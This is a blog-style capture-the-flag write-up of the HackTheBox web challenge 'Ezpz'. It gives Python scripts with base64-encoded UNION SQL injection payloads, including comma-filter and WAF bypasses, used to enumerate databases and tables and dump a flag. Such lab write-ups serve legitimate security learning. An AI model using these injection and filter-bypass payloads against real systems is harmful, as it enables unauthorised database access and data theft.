HackTheBox Web Challenge Ezpz

This challenge was really amazing as I get to know about new errors and how to resolve them.


Given a website that immediately raises an error. The first error called "obj" does not exist, so it seems we need to propagate using the variable "obj" and after entering this first error disappears.


http://docker.hackthebox.eu:32299/?obj=a


For the second error, there should be a little reading, say there is a non-object 'ID', it seems we need to provide an “ID” too, but it is different from “obj”. Reading a little about data types I see we can provide object values ​​with passing json ...

reference:

https://forum.getkirby.com/t/trying-to-get-property-of-non-object-error/3486


we can do like {"ID": "1234"}, but it doesn't seem like it's passing, in the inspect there is a hint.

base64_encode ($ data), it looks like we have to change the payload to base64 first.


http://docker.hackthebox.eu:32299/?obj=eyJJRCI6ICIxMjM0In0=


Now there is no error, but there is no output either ... here I am getting stuck, trying a lot of things and finally ... I found something with '(pick one), by changing the value ID to' we get another error.


mysqli_fetch_assoc () error. Looks like we have to do SQLI. dabbling finally finding something. (Next will be done via python because ... convert to base64 continuously exhausting .-.).


Python Code: #seems like they block , (coma) url = "http://docker.hackthebox.eu:32299/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT 1,2\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser')

#Bs in the python code is BeautifulSoup from the bs4 library flag.prettify() print flag.center.get_text()


Trying to get errors when using, (coma).

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

search from PayloadsAllTheThings we can use a bypass coma, using that ...


Python Code:


#"2" seems to be printed (bypass coma) url = "http://docker.hackthebox.eu:32299/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text()


You can see the output printed for part "2", first thing first find out the name of the database.

Python Code: #get database names url = "http://docker.hackthebox.eu:32299/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT schema_name FROM information_schema.schemata)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() outputs = flag.find_all('h4') for output in outputs: print output.get_text()


there is a suspicious database 'ezpz', then I want to find the table name.

Python Code: #blocked again by waf but... url = "http://docker.hackthebox.eu:32299/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM information_schema.tables)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text()


It looks like we're blocked again, but ... Python Code: #this doesn't get blocked... so maybe information_schema.tables is blocked url = "http://docker.hackthebox.eu:32299/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.center.get_text()


By not using information_schema.tables we get the usual mysqli error instead of WAF. Looking again at PayloadsAllTheThings there is a way to bypass information_schema.tables too.


Python Code: #get table names (bypass information_schema.tables) url = "http://docker.hackthebox.eu:32299/?obj=" payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM mysql.innodb_table_stats)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() outputs = flag.find_all('h4') for output in outputs: print output.get_text()


Get FlagTableUnguessableEzPZ as table name. Now we only need to release the contents.

Python Code: #final payload url = "http://docker.hackthebox.eu:32299/?obj="

payload = base64.b64encode("{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT * FROM ezpz.FlagTableUnguessableEzPZ)b#\"}") send = url + payload result = requests.get(send) flag = bs(result.text, 'html.parser') flag.prettify() print flag.h4.get_text()


Flag : HTB{*********************************}


Please share your comments and If you enjoyed this blog post, share it with a friend! See you guys in next post soon.

73 views1 comment

Recent Posts

See All